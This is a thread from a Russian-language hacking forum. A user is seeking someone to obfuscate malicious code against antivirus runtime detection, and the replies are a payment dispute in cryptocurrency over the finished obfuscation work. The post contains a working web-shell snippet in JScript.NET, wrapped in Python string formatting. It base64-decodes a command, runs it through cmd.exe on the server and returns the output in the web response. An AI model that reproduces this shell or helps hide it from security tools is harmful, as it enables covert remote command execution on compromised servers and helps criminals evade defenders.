• XSS.stack #1 – первый литературный журнал от юзеров форума

Не актуально

В этой теме можно использовать автоматический гарант!

Пожалуйста, обратите внимание, что пользователь заблокирован
Доброго времени суток.. ищу человека кто смог бы на постоянку запутывать подобный код(под спойлером) от рантайм детектов ав. Первый контакт в ЛС.

shell_body_exec = {code:"""var command=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("{}")); var c=new System.Diagnostics.ProcessStartInfo("cmd.exe");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+command;e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write("ZZzzZzZz" + out.ReadToEnd()+EI.ReadToEnd() + "ZZzzZzZz");""".format(base64.b64encode(cmd.encode()).decode())}
скинул в пм

если монеты в колличестве 60$ не поступят на кош который я тебе 2 дня назад скидывал то увы будет арбитраж))
ты попросил обфусцировать твой код я тебе полностью обфусцировал весь твой файл ну и чтоб cmd окно не вылазило добавил аргумент который не был прописан в коде.
файлик который ты получил полностью рабочий.
я тебе вначале предложил чтоб по деньгам ты скинул сумму которую посчитаешь нужным ты видимо посчитал что ничего ты не должен скидывать и просто забил х** на это дело..

жду сутки и пишу арбитраж ( смешно скамить на 60$ )

Последнее редактирование:
если монеты в колличестве 60$ не поступят на кош который я тебе 2 дня назад скидывал то увы будет арбитраж))
ты попросил обфусцировать твой код я тебе полностью обфусцировал весь твой файл ну и чтоб cmd окно не вылазило добавил аргумент который не был прописан в коде.
файлик который ты получил полностью рабочий.
я тебе вначале предложил чтоб по деньгам ты скинул сумму которую посчитаешь нужным ты видимо посчитал что ничего ты не должен скидывать и просто забил х** на это дело..

жду сутки и пишу арбитраж ( смешно скамить на 60$ )
данный вопрос уже решен! Претензий никаких не имею

Напишите ответ...
Верх